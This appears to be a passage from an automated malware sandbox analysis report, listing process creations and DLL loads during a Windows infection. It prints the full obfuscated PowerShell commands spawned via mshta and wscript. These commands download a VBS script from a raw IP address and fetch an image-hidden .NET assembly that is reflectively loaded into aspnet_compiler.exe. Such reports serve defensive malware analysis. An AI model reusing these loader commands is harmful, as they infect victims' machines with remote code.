                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
                      Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES66CD.tmp" "c:\Users\user\AppData\Local\Temp\hfoj0pnm\CSC102A1040D3F84A7CBD6AF35F51E7FDEF.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
